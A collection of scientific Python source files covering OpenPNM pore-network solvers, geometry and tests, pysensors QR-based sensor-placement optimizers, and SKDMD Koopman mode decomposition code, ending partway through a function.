temp = {"type": self.settings["solver_type"],
"preconditioner": self.settings["solver_preconditioner"]}
ls = SLS(A=A, b=b, settings=temp)
x = ls.solve(x0=x0, atol=atol, rtol=rtol, max_it=max_it)
# PyAMG
if self.settings['solver_family'] == 'pyamg':
# Check if PyAMG is available
try:
import pyamg
except Exception:
raise ModuleNotFoundError('PyAMG is not installed.')
ml = pyamg.ruge_stuben_solver(A)
x = ml.solve(b=b, tol=rtol, maxiter=max_it)
return x
def _get_atol(self):
r"""
Fetches absolute tolerance for the solver if not ``None``, otherwise
calculates it in a way that meets the given ``tol`` requirements.
``atol`` is defined such to satisfy the following stopping criterion:
``norm(A*x-b)`` <= ``atol``
"""
atol = self.settings["solver_atol"]
if atol is None:
tol = self.settings["solver_tol"]
atol = norm(self.b) * tol
return atol
def _get_rtol(self, x0):
r"""
Fetches relative tolerance for the solver if not ``None``, otherwise
calculates it in a way that meets the given ``tol`` requirements.
``rtol`` is defined based on the following formula:
``rtol = residual(@x_final) / residual(@x0)``
"""
rtol = self.settings["solver_rtol"]
if rtol is None:
res0 = self._get_residual(x=x0)
atol = self._get_atol()
rtol = atol / res0
return rtol
def _check_for_nans(self):
r"""
Check whether A and b are well-defined, i.e. doesn't contain nans.
"""
# Return if everything looks good
if not np.isnan(self.A.data).any():
if not np.isnan(self.b).any():
return
import networkx as nx
from pandas import unique
# Fetch phase/geometries/physics
prj = self.network.project
phase = prj.find_phase(self)
geometries = prj.geometries().values()
physics = prj.physics().values()
# Locate the root of NaNs
unaccounted_nans = []
for geom, phys in zip(geometries, physics):
objs = [phase, geom, phys]
# Generate global dependency graph
dg = nx.compose_all([x.models.dependency_graph(deep=True) for x in objs])
d = {} # maps prop -> obj.name
for obj in objs:
for k, v in obj.check_data_health().items():
if "Has NaNs" in v:
# FIXME: The next line doesn't cover multi-level props
base_prop = ".".join(k.split(".")[:2])
if base_prop in dg.nodes:
d[base_prop] = obj.name
else:
unaccounted_nans.append(base_prop)
# Generate dependency subgraph for props with NaNs
dg_nans = nx.subgraph(dg, d.keys())
# Find prop(s)/object(s) from which NaNs have propagated
root_props = [n for n in d.keys() if not nx.ancestors(dg_nans, n)]
root_objs = unique([d[x] for x in nx.topological_sort(dg_nans)])
# Throw error with helpful info on how to resolve the issue
if root_props:
msg = (
f"Found NaNs in A matrix, possibly caused by NaNs in "
f"{', '.join(root_props)}. The issue might get "
f"resolved if you call regenerate_models on the following "
f"object(s): {', '.join(root_objs)}"
)
raise Exception(msg)
# Raise Exception otherwise
if unaccounted_nans:
raise Exception(f"Found NaNs in A matrix, possibly caused by NaNs in "
f"{', '.join(unaccounted_nans)}.")
def results(self):
r"""
Fetches the calculated quantity from the algorithm and returns it as
an array.
"""
quantity = self.settings['quantity']
d = {quantity: self[quantity]}
return d
def rate(self, pores=[], throats=[], mode='group'):
r"""
Calculates the net rate of material moving into a given set of pores or
throats
Parameters
----------
pores : array_like
The pores for which the rate should be calculated
throats : array_like
The throats through which the rate should be calculated
mode : string, optional
Controls how to return the rate. Options are:
*'group'*: (default) Returns the cumulative rate of material
moving into the given set of pores
*'single'* : Calculates the rate for each pore individually
Returns
-------
If ``pores`` are specified, then the returned values indicate the
net rate of material exiting the pore or pores. Thus a positive
rate indicates material is leaving the pores, and negative values
mean material is entering.
If ``throats`` are specified the rate is calculated in the direction of
the gradient, thus is always positive.
If ``mode`` is 'single' then the cumulative rate through the given
pores (or throats) are returned as a vector, if ``mode`` is 'group'
then the individual rates are summed and returned as a scalar.
"""
pores = self._parse_indices(pores)
throats = self._parse_indices(throats)
network = self.project.network
phase = self.project.phases()[self.settings['phase']]
g = phase[self.settings['conductance']]
quantity = self[self.settings['quantity']]
P12 = network['throat.conns']
X12 = quantity[P12]
if g.size == self.Nt:
g = np.tile(g, (2, 1)).T # Make conductance a Nt by 2 matrix
# The next line is critical for rates to be correct
g = np.flip(g, axis=1)
Qt = np.diff(g*X12, axis=1).squeeze()
if len(throats) and len(pores):
raise Exception('Must specify either pores or throats, not both')
if len(throats) == 0 and len(pores) == 0:
raise Exception('Must specify either pores or throats')
elif len(throats):
R = np.absolute(Qt[throats])
if mode == 'group':
R = np.sum(R)
elif len(pores):
Qp = np.zeros((self.Np, ))
np.add.at(Qp, P12[:, 0], -Qt)
np.add.at(Qp, P12[:, 1], Qt)
R = Qp[pores]
if mode == 'group':
R = np.sum(R)
return np.array(R, ndmin=1)
def set_solver(
self,
solver_family=None,
solver_type=None,
preconditioner=None,
tol=None,
atol=None,
rtol=None,
maxiter=None,
):
r"""
Set the solver to be used to solve the algorithm.
The values of those fields that are not provided will be retrieved from
algorithm settings dict.
Parameters
----------
solver_family : string, optional
Solver family, could be "scipy", "petsc", and "pyamg".
solver_type : string, optional
Solver type, could be "spsolve", "cg", "gmres", etc.
preconditioner : string, optional
Preconditioner for iterative solvers. The default is "jacobi".
tol : float, optional
Tolerance for iterative solvers, loosely related to number of
significant digits in data.
atol : float, optional
Absolute tolerance for iterative solvers, such that
norm(Ax-b) <= atol holds.
rtol : float, optional
Relative tolerance for iterative solvers, loosely related to how
many orders of magnitude reduction in residual is desired, compared
to its value at initial guess.
Returns
-------
None.
"""
settings = self.settings
# Preserve pre-set values, if any
if solver_family is None:
solver_family = settings["solver_family"]
if solver_type is None:
solver_type = settings["solver_type"]
if preconditioner is None:
preconditioner = settings["solver_preconditioner"]
if tol is None:
tol = settings["solver_tol"]
if atol is None:
atol = settings["solver_atol"]
if rtol is None:
rtol = settings["solver_rtol"]
if maxiter is None:
maxiter = settings["solver_maxiter"]
# Update settings on algorithm object
self.settings.update(
{
"solver_family": solver_family,
"solver_type": solver_type,
"solver_preconditioner": preconditioner,
"solver_tol": tol,
"solver_atol": atol,
"solver_rtol": rtol,
"solver_maxiter": maxiter
}
)
def _get_residual(self, x=None):
r"""
Calculate solution residual based on the given ``x`` based on the
following formula:
``res = norm(A*x - b)``
"""
if x is None:
quantity = self.settings['quantity']
x = self[quantity]
return norm(self.A * x - self.b)
def _calc_eff_prop(self, inlets=None, outlets=None,
domain_area=None, domain_length=None):
r"""
Calculate the effective transport through the network
Parameters
----------
inlets : array_like
The pores where the inlet boundary conditions were applied. If
not given an attempt is made to infer them from the algorithm.
outlets : array_like
The pores where the outlet boundary conditions were applied. If
not given an attempt is made to infer them from the algorithm.
domain_area : scalar
The area of the inlet and/or outlet face (which shold match)
domain_length : scalar
The length of the domain between the inlet and outlet faces
Returns
-------
The effective transport property through the network
"""
if self.settings['quantity'] not in self.keys():
raise Exception('The algorithm has not been run yet. Cannot '
+ 'calculate effective property.')
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
Dx = np.abs(np.diff(BCs))
if inlets is None:
inlets = self._get_inlets()
flow = self.rate(pores=inlets)
# Fetch area and length of domain
if domain_area is None:
domain_area = self._get_domain_area(inlets=inlets,
outlets=outlets)
if domain_length is None:
domain_length = self._get_domain_length(inlets=inlets,
outlets=outlets)
D = np.sum(flow)*domain_length/domain_area/Dx
return D
def _get_inlets(self):
# Determine boundary conditions by analyzing algorithm object
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
inlets = np.where(self['pore.bc_value'] == np.amax(BCs))[0]
return inlets
def _get_outlets(self):
# Determine boundary conditions by analyzing algorithm object
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
outlets = np.where(self['pore.bc_value'] == np.amin(BCs))[0]
return outlets
def _get_domain_area(self, inlets=None, outlets=None):
logger.warning('Attempting to estimate inlet area...will be low')
network = self.project.network
# Abort if network is not 3D
if np.sum(np.ptp(network['pore.coords'], axis=0) == 0) > 0:
raise Exception('The network is not 3D, specify area manually')
if inlets is None:
inlets = self._get_inlets()
if outlets is None:
outlets = self._get_outlets()
inlets = network['pore.coords'][inlets]
outlets = network['pore.coords'][outlets]
if not iscoplanar(inlets):
logger.error('Detected inlet pores are not coplanar')
if not iscoplanar(outlets):
logger.error('Detected outlet pores are not coplanar')
Nin = np.ptp(inlets, axis=0) > 0
if Nin.all():
logger.warning('Detected inlets are not oriented along a '
+ 'principle axis')
Nout = np.ptp(outlets, axis=0) > 0
if Nout.all():
logger.warning('Detected outlets are not oriented along a '
+ 'principle axis')
hull_in = ConvexHull(points=inlets[:, Nin])
hull_out = ConvexHull(points=outlets[:, Nout])
if hull_in.volume != hull_out.volume:
logger.error('Inlet and outlet faces are different area')
area = hull_in.volume # In 2D volume=area, area=perimeter
return area
def _get_domain_length(self, inlets=None, outlets=None):
logger.warning('Attempting to estimate domain length...'
+ 'could be low if boundary pores were not added')
network = self.project.network
if inlets is None:
inlets = self._get_inlets()
if outlets is None:
outlets = self._get_outlets()
inlets = network['pore.coords'][inlets]
outlets = network['pore.coords'][outlets]
if not iscoplanar(inlets):
logger.error('Detected inlet pores are not coplanar')
if not iscoplanar(outlets):
logger.error('Detected inlet pores are not coplanar')
tree = cKDTree(data=inlets)
Ls = np.unique(np.float64(tree.query(x=outlets)[0]))
if not np.allclose(Ls, Ls[0]):
logger.error('A unique value of length could not be found')
length = Ls[0]
return length
```
#### File: openpnm/geometry/Imported.py
```python
import openpnm.models as mods
from openpnm.geometry import GenericGeometry
from openpnm.utils import logging, GenericSettings
logger = logging.getLogger(__name__)
class ImportedSettings(GenericSettings):
r"""
Parameters
----------
pore_diameter : str (default = 'pore.extended_diameter')
Key into the extracted data array to use as pore diameter in other
geometry calculations. The default is . Use of 'pore.' is not
required.
throat_diameter : str (default = 'throat.equivalent_diameter')
Key into the extracted data array to use as throat diameter in other
geometry calculations. Use of 'throat.' is not required.
pore_shape : string {'sphere' (default), 'cube'}
Specifies which shape to assume when calculating dependent properties
such as volume and surface area.
throat_shape : string {'cylinder' (default), 'cuboid'}
Specifies which shape to assume when calculating dependent properties
such as volume and surface area.
"""
pore_diameter = 'pore.extended_diameter'
throat_diameter = 'throat.equivalent_diameter'
pore_shape = 'sphere'
throat_shape = 'cylinder'
class Imported(GenericGeometry):
r"""
This geometry class extracts all numerical properites from the received
network object and moves them to itself.
This class is intended for use with networks imported from network
extraction codes, where the geometry properties are included on the
network itself.
Parameters
----------
network : OpenPNM Network object
The network with which this Geometry should be associated
exclude : list of strings
A list of which network properties should *not* be transferred to
new geometry object. 'pore.coords' and 'throat.conns' are *always*
excluded. Note that labels are not transferred, only properties.
project : OpenPNM Project object, optional
Can be supplied in addition to ``network`` but is inferred from the
network's project if not given.
name : string
The name of the object, which is also used as the label where this
geometry is defined.
Notes
-----
An error occurs when adding other geometries to a network that has
geometrical properties such as 'pore.diameter'. This can occur when
adding boundary pores or in more elaborate scenarios such as stitching
networks together. The issue arises because OpenPNM prevents a property,
such as 'pore.volume', from existing on both the network and also a
geometry. Thus it is necessary to move the extracted network properties
to this ``Imported`` class, then create new geometry objects for any
added pores as needed.
"""
def __init__(self, network, exclude=[], settings={}, **kwargs):
self.settings._update_settings_and_docs(ImportedSettings())
self.settings.update(settings)
super().__init__(network=network, **kwargs)
# Transfer all geometrical properties off of network
exclude.extend(['pore.coords', 'throat.conns'])
for item in network.props():
if item not in exclude:
self[item] = network.pop(item)
# If the following 'essential' props are not already defined, then
# they should be added using the specified values or models
if 'pore.diameter' not in self.keys():
pdia = 'pore.'+self.settings['pore_diameter'].split('pore.')[-1]
try:
self['pore.diameter'] = self[pdia]
except KeyError:
logger.error(pdia + " not found, can't assign 'pore.diameter'")
if 'pore.volume' not in self.keys():
pore_shape = self.settings['pore_shape']
m = getattr(mods.geometry.pore_volume, pore_shape)
self.add_model(propname='pore.volume',
model=m, pore_diameter='pore.diameter')
if 'pore.area' not in self.keys():
pore_shape = self.settings['pore_shape']
m = getattr(mods.geometry.pore_area, pore_shape)
self.add_model(propname='pore.area',
model=m)
if 'throat.diameter' not in self.keys():
tdia = 'throat.'+self.settings['throat_diameter'].split('throat.')[-1]
try:
self['throat.diameter'] = self[tdia]
except KeyError:
logger.error(tdia + " not found, can't assign 'throat.diameter'")
if 'throat.endpoints' not in self.keys():
self.add_model(propname='throat.endpoints',
model=mods.geometry.throat_endpoints.spherical_pores,
pore_diameter='pore.diameter',
throat_diameter='throat.diameter')
if 'throat.length' not in self.keys():
self.add_model(propname='throat.length',
model=mods.geometry.throat_length.piecewise,
throat_endpoints='throat.endpoints')
if 'throat.volume' not in self.keys():
shape = self.settings['throat_shape']
m = getattr(mods.geometry.throat_volume, shape)
self.add_model(propname='throat.volume',
model=m,
throat_length='throat.length',
throat_diameter='throat.diameter')
if 'throat.conduit_lengths' not in self.keys():
self.add_model(propname='throat.conduit_lengths',
model=mods.geometry.throat_length.conduit_lengths,
throat_endpoints='throat.endpoints',
throat_length='throat.length')
```
#### File: openpnm/io/Pandas.py
```python
import numpy as np
import scipy as sp
from flatdict import FlatDict
from collections import namedtuple
from openpnm.io import Dict, GenericIO
from openpnm.utils import sanitize_dict, logging
logger = logging.getLogger(__name__)
class Pandas(GenericIO):
r"""
Combines all data arrays into a Pandas DataFrame object
The structure of a DataFrame is a very close match to OpenPNMs data
storage. Each key becomes a column header in the Dataframe, and each
pore or throat entry becomes a row.
Limitations of the DataFrame are the inability to have multidimensional
data in a single column. The methods on a DataFrame are also oriented
towards time-series data.
Nonetheless, Pandas offers many useful features such as performing
statistical analysis on property. DataFrames also offer *many* options for
exporting to other file formats, so if a format is not yet supported
by OpenPNM, this could be an solution.
"""
@classmethod
def to_dataframe(cls, network=None, phases=[], join=False, delim=' | '):
r"""
Convert the Network (and optionally Phase) data to Pandas DataFrames.
Parameters
----------
network: OpenPNM Network Object
The network containing the data to be stored
phases : list of OpenPNM Phase Objects
The data on each supplied phase will be added to DataFrame
join : boolean
If ``False`` (default), two DataFrames are returned with *pore*
data in one, and *throat* data in the other. If ``True`` the pore
and throat data are combined into a single DataFrame. This can be
problematic as it will put NaNs into all the *pore* columns which
are shorter than the *throat* columns.
Returns
-------
Pandas ``DataFrame`` object containing property and label data in each
column. If ``join`` was False (default) the two DataFrames are
returned i a named tuple, or else a single DataFrame with pore and
throat data in the same file, despite the column length being
different.
"""
from pandas import DataFrame
project, network, phases = cls._parse_args(network=network,
phases=phases)
# Initialize pore and throat data dictionary using Dict class
pdata = Dict.to_dict(network=network, phases=phases, element='pore',
interleave=True, flatten=True,
categorize_by=['object'])
tdata = Dict.to_dict(network=network, phases=phases, element='throat',
interleave=True, flatten=True,
categorize_by=['object'])
pdata = FlatDict(pdata, delimiter=delim)
tdata = FlatDict(tdata, delimiter=delim)
# Scan data and convert non-1d arrays to multiple columns
for key in list(pdata.keys()):
if np.shape(pdata[key]) != (network[0].Np,):
arr = pdata.pop(key)
tmp = np.split(arr, arr.shape[1], axis=1)
cols = range(len(tmp))
pdata.update({key+'['+str(i)+']': tmp[i].squeeze()
for i in cols})
for key in list(tdata.keys()):
if np.shape(tdata[key]) != (network[0].Nt,):
arr = tdata.pop(key)
tmp = np.split(arr, arr.shape[1], axis=1)
cols = range(len(tmp))
tdata.update({key+'['+str(i)+']': tmp[i].squeeze()
for i in cols})
# Convert sanitized dictionaries to DataFrames
pdata = DataFrame(sanitize_dict(pdata))
tdata = DataFrame(sanitize_dict(tdata))
# Prepare DataFrames to be returned
if join:
data = tdata.join(other=pdata, how='left')
else:
nt = namedtuple('dataframes', ('pore', 'throat'))
data = nt(pore=pdata, throat=tdata)
return data
@classmethod
def from_dataframe(cls):
r"""
"""
raise NotImplementedError()
```
#### File: unit/algorithms/OrdinaryPercolationTest.py
```python
import pytest
import numpy as np
import scipy as sp
import openpnm as op
mgr = op.Workspace()
class OrdinaryPercolationTest:
def setup_class(self):
self.net = op.network.Cubic(shape=[5, 5, 5], spacing=0.0005)
self.geo = op.geometry.StickAndBall(network=self.net,
pores=self.net.Ps,
throats=self.net.Ts)
self.water = op.phases.Water(network=self.net)
self.air = op.phases.Air(network=self.net)
self.phys = op.physics.GenericPhysics(network=self.net,
phase=self.water,
geometry=self.geo)
mod = op.models.physics.capillary_pressure.washburn
self.phys.add_model(propname='throat.entry_pressure',
model=mod)
def test_set_inlets_overwrite(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
assert np.sum(self.alg['pore.inlets']) == 25
self.alg.set_inlets(pores=self.net.pores('bottom'))
assert np.sum(self.alg['pore.inlets']) == 50
self.alg.set_inlets(pores=self.net.pores('top'), overwrite=True)
assert np.sum(self.alg['pore.inlets']) == 25
self.alg.set_inlets(pores=[], overwrite=True)
assert np.sum(self.alg['pore.inlets']) == 0
def test_set_inlets_conflicting_with_outlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg['pore.outlets'][self.net.pores('top')] = True
with pytest.raises(Exception):
self.alg.set_inlets(pores=self.net.pores('top'))
def test_set_outlets_conflicting_with_inlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg['pore.inlets'][self.net.pores('top')] = True
with pytest.raises(Exception):
self.alg.set_outlets(pores=self.net.pores('top'))
def test_set_outlets_without_trapping(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
with pytest.raises(Exception):
self.alg.set_outlets(pores=self.net.pores('top'))
def test_set_outlets_overwrite(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_outlets(pores=self.net.pores('top'))
assert np.sum(self.alg['pore.outlets']) == 25
self.alg.set_outlets(pores=self.net.pores('bottom'))
assert np.sum(self.alg['pore.outlets']) == 50
self.alg.set_outlets(pores=self.net.pores('top'), overwrite=True)
assert np.sum(self.alg['pore.outlets']) == 25
self.alg.set_outlets(pores=[], overwrite=True)
assert np.sum(self.alg['pore.outlets']) == 0
def test_set_residual_modes(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts)
assert np.sum(self.alg['pore.residual']) == np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) == np.size(np.unique(Ts))
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts)
assert np.sum(self.alg['pore.residual']) > np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) > np.size(np.unique(Ts))
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts, overwrite=True)
assert np.sum(self.alg['pore.residual']) == np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) == np.size(np.unique(Ts))
self.alg.set_residual(pores=[], throats=[], overwrite=True)
assert np.sum(self.alg['pore.residual']) == 0
self.alg.set_residual(pores=Ps, throats=Ts)
self.alg.set_residual(overwrite=True)
assert np.sum(self.alg['pore.residual']) == 0
def test_run_npts(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
self.alg.set_inlets(pores=Ps)
self.alg.run(points=20)
def test_run_inv_pressures(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
self.alg.set_inlets(pores=Ps)
self.alg.run(points=range(0, 20000, 1000))
def test_run_no_inlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
with pytest.raises(Exception):
self.alg.run()
def test_run_w_residual_pores_and_throats(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
self.alg.set_residual(pores=self.net.pores('bottom'))
self.alg.run()
data = self.alg.results(Pc=20000)
assert sum(data['pore.occupancy']) > 0
assert sum(data['throat.occupancy']) > 0
def test_is_percolating(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water,
access_limited=True)
self.alg.set_inlets(pores=self.net.pores('top'))
self.alg.set_outlets(pores=self.net.pores('bottom'))
self.alg.run()
assert not self.alg.is_percolating(0)
assert self.alg.is_percolating(1e5)
if __name__ == '__main__':
t = OrdinaryPercolationTest()
t.setup_class()
self = t
for item in t.__dir__():
if item.startswith('test'):
print('running test: '+item)
t.__getattribute__(item)()
``` |
{
"source": "Jimmy-INL/pysensors",
"score": 3
} |
#### File: pysensors/optimizers/_ccqr.py
```python
import numpy as np
from ._qr import QR
class CCQR(QR):
"""
Greedy cost-constrained QR optimizer for sensor selection.
Ranks sensors in descending order of "importance" based on
reconstruction performance and sensor cost. Uses a cost-sensitive
version of the QR algorithm.
This method is based on the following work:
Clark, Emily, et al.
"Greedy sensor placement with cost constraints."
IEEE Sensors Journal 19.7 (2018): 2642-2656.
"""
def __init__(self, sensor_costs=None):
"""
Greedy cost-constrained QR optimizer for sensor selection.
This algorithm augments the pivot selection criteria used in the
QR algorithm (with householder reflectors) to take into account
costs associated with each sensors. It is similar to the
:class:`pysensors.optimizers.QR` algorithm in that it returns an array
of sensor locations ranked by importance, but with a definition of
importance that takes sensor costs into account.
Parameters
----------
sensor_costs: np.ndarray, shape [n_features,], optional (default None)
Costs (weights) associated with each sensor.
Positive values will encourage sensors to be avoided and
negative values will cause them to be preferred.
If None, costs will all be set to zero.
Attributes
----------
pivots_ : np.ndarray, shape [n_features]
Ranked list of sensor locations.
"""
super(CCQR, self).__init__()
if sensor_costs is not None and np.ndim(sensor_costs) != 1:
raise ValueError(
"sensor_costs must be a 1D array, "
f"but a {np.ndim(sensor_costs)}D array was given"
)
self.sensor_costs = sensor_costs
def fit(
self,
basis_matrix,
):
"""
Parameters
----------
basis_matrix: np.ndarray, shape [n_features, n_samples]
Matrix whose columns are the basis vectors in which to
represent the measurement data.
optimizer_kws: dictionary, optional
Keyword arguments to be passed to the qr method.
Returns
-------
self: a fitted :class:`pysensors.optimizers.CCQR` instance
"""
n, m = basis_matrix.shape # We transpose basis_matrix below
if self.sensor_costs is None:
self.sensor_costs = np.zeros(n)
if len(self.sensor_costs) != n:
raise ValueError(
f"Dimension of sensor_costs ({len(self.sensor_costs)}) "
f"does not match number of sensors in data ({n})"
)
# Initialize helper variables
R = basis_matrix.conj().T.copy()
p = np.arange(n)
k = min(m, n)
for j in range(k):
u, i_piv = qr_reflector(R[j:, j:], self.sensor_costs[p[j:]])
# Track column pivots
i_piv += j
p[[j, i_piv]] = p[[i_piv, j]]
# Switch columns
R[:, [j, i_piv]] = R[:, [i_piv, j]]
# Apply reflector
R[j:, j:] -= np.outer(u, np.dot(u, R[j:, j:]))
R[j + 1 :, j] = 0
self.pivots_ = p
return self
def qr_reflector(r, costs):
"""
Get the best (Householder) reflector with column pivoting and
a cost function.
The pivoting is biased by a cost function, i.e.
the pivot is chosen as the argmax of :code:`norm(r[:, i]) - costs[i]`,
whereas normally it would be chosen as the argmax of :code:`norm(r[:, i])`.
Parameters
----------
r: np.ndarray, shape [n_features, n_examples]
Sub-array for which the pivot and reflector are to be found
costs: np.ndarray, shape [n_examples,]
Costs for each column (sensor location) in r
Returns
-------
u: np.ndarray, shape [n_features,]
Householder reflector.
i_piv: nonnegative integer
Index of the pivot.
"""
# Norm of each column
dlens = np.sqrt(np.sum(np.abs(r) ** 2, axis=0))
# Choose pivot
i_piv = np.argmax(dlens - costs)
dlen = dlens[i_piv]
if dlen > 0:
u = r[:, i_piv] / dlen
u[0] += np.sign(u[0]) + (u[0] == 0)
u /= np.sqrt(abs(u[0]))
else:
u = r[:, i_piv]
u[0] = np.sqrt(2)
return u, i_piv
```
#### File: pysensors/optimizers/_qr.py
```python
from scipy.linalg import qr
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_is_fitted
class QR(BaseEstimator):
"""
Greedy QR optimizer for sensor selection.
Ranks sensors in descending order of "importance" by applying
the QR algorithm and extracting pivot indices.
See the following reference for more information
Manohar, Krithika, et al.
"Data-driven sparse sensor placement for reconstruction:
Demonstrating the benefits of exploiting known patterns."
IEEE Control Systems Magazine 38.3 (2018): 63-86.
"""
def __init__(self):
"""
Attributes
----------
pivots_ : np.ndarray, shape [n_features]
Ranked list of sensor locations.
"""
self.pivots_ = None
def fit(self, basis_matrix, **optimizer_kws):
"""
Parameters
----------
basis_matrix: np.ndarray, shape [n_features, n_samples]
Matrix whose columns are the basis vectors in which to
represent the measurement data.
optimizer_kws: dictionary, optional
Keyword arguments to be passed to the qr method.
Returns
-------
"""
# TODO: implement checks on basis_matrix
_, _, self.pivots_ = qr(basis_matrix.conj().T, pivoting=True, **optimizer_kws)
return self
def get_sensors(self):
"""
Get ranked array of sensors.
Returns
-------
sensors: np.ndarray, shape [n_features,]
Array of sensors ranked in descending order of importance.
Note that if n_features exceeds n_samples, then only the first
n_samples entries of sensors are guaranteed to be in ranked order.
"""
check_is_fitted(self, "pivots_")
return self.pivots_
``` |
{
"source": "Jimmy-INL/SKDMD",
"score": 2
} |
#### File: EXAMPLES/cylinder_re100/example_20d_cyd.py
```python
import numpy as np
import gc
import sys
sys.dont_write_bytecode = True
sys.path.append('../../MODEL_SRC')
from dkdmd import DKDMD
def main(case, noise_level, sigma_list, rank_list):
# Case description
case_name = case + '_noise_level_' + str(noise_level)
## original data
total_number_train_data = 297
# KDMD Options
kdmd_rank_list = rank_list
kernel = 'gaussian'
# kernel = 'polynomial'
for sigma in sigma_list:
for rank in kdmd_rank_list:
config = {
'model_case' : case_name,
'kernel' : kernel,
'sigma' : sigma,
'reduced_rank' : rank
}
case_dir = './' + config['model_case']
data = np.load(case_dir + '/' + str(total_number_train_data) + '_trainData.npz')
# feed with trajectory data
X = data['Xtrain']
tspan = data['tspan']
print('')
print('...KDMD....', ' sigma = ', config['sigma'], ' reduced_rank = ', config['reduced_rank'])
# start modeling with KDMD
kdmdLearner = DKDMD(config)
kdmdLearner.train(X=X, dt=tspan[1]-tspan[0])
kdmdLearner.save_model()
gc.collect()
if __name__ == '__main__':
case = '20d_cylinder'
noise_level = 0
type = 'KDMD'
sigma_list = [3]
rank_list = [180] # [400]
main(case,noise_level,sigma_list, rank_list)
```
#### File: SKDMD/MODEL_SRC/cedmd.py
```python
import numpy as np
import sys
sys.path.insert(0, '../../../')
sys.dont_write_bytecode = True
from SKDMD.MODEL_SRC.edmd import EDMD
from scipy.special import hermitenorm
class CEDMD(EDMD):
"""
Class for Continuous Extended DMD with dictionary as
.. note::
"""
def __init__(self, config):
super(CEDMD, self).__init__(config)
self.type = 'c'
if self.dict == 'hermite':
self.model_dir = self.case_dir + '/' + self.type + '-edmd-h' + str(config['hermite_order']) + '-r' + str(config['reduced_rank'])
elif self.dict == 'rff_gaussian':
self.model_dir = self.case_dir + '/' + self.type + '-edmd-rff-' + str(self.rff_number_features) + \
'-gaussian_sigma-'+ str(self.rff_sigma_gaussian) + '-rank-' + str(config['reduced_rank'])
elif self.dict == 'nystrom':
pass
else:
raise NotImplementedError('this functionality has not been implemented!!!')
self.makedir(self.model_dir)
# def get_rff_features_grad_with_gxT(self, x, gxT):
# # x is supposed to be shape (1, N_sysdim)
# # gxT is supposed to be shape = (N_input, N_sysdim)
# return self.gen_rff_features_dot(Xdot=gxT, X=x)
def gen_rff_features_dot(self, Xdot, X):
Q = np.matmul(X, self.rff_z)
M = np.hstack([ -np.sin(Q), np.cos(Q) ]) # since it is the grad...so cos -> -sin..
R = np.matmul(Xdot, self.rff_z)
R = np.hstack([R, R])
Fdot = R*M # elementwise multiplication
return Fdot
def compute_deigphi_dt(self, x, xdot, index_selected_modes=None):
if self.FLAG['normalize']:
eta_input_matrix = self.transform_to_eta(x)
etaDot_input_matrix = self.transform_to_eta(xdot)
xdot_input = etaDot_input_matrix
x_input = eta_input_matrix
else:
xdot_input = xdot
x_input = x
if type(index_selected_modes) == type(None):
deigphi_dt = np.matmul(self.gen_grad_dict_dot_f(xdot_input, x_input), self.Koopman['eigenvectors'])
else:
deigphi_dt = np.matmul(self.gen_grad_dict_dot_f(xdot_input, x_input), self.Koopman['eigenvectors'][:,index_selected_modes])
return deigphi_dt
def gen_grad_dict_dot_f(self, Xdot, X):
"""
compute the gradient of phi dot product with f
:type Xdot: np.ndarray
:param Xdot: time derivative of state
:return: generated_gradPhi_dot_f_array
:rtype: np.ndarray
"""
num_sample, num_components = Xdot.shape
if self.dict == 'hermite':
# normalized hermite polynomial
## compute [ [d[H0(x1).. H0(xn)]/dx1,...,d[HN(x1).. HN(xn)]/dx1 ],
# ...
# [d[H0(x1).. H0(xn)]/dxn,...,d[HN(x1).. HN(xn)]/dxn ] ]
generated_feature_array_list = []
feature_list_ddx_list = []
for i_component in range(num_components):
feature_list = []
for order in range(self.hermite_order + 1):
phi_i = hermitenorm(order)
phi_i_dx = np.poly1d.deriv(phi_i)
phi_i_X = np.polyval(phi_i, X)
# update i_component with the derivative one
phi_i_X[:, i_component] = np.polyval(phi_i_dx, X[:, i_component])
feature_list.append(phi_i_X)
feature_list_ddx_list.append(feature_list)
# generate feature array from feature list for each i_component
generated_feature_array = self.gen_cross_component_features(
feature_list=feature_list,
num_sample=num_sample,
num_components=num_components
)
# dot product f with the gradient
Xdot_i_component = Xdot[:, i_component]
Xdot_i_matrix = np.diag(Xdot_i_component)
generated_feature_array_list.append(np.matmul(Xdot_i_matrix, generated_feature_array))
# summing up the dot product for each component
generated_gradPhi_dot_f_array = np.sum(generated_feature_array_list, axis=0)
elif self.dict == 'rff_gaussian':
